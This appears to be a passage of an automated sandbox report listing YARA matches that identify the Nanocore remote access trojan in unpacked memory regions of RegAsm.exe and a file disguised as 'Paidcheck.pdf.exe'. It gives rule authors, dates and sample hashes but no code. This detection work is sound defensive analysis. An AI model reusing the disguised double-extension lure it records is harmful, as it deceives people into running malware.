      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
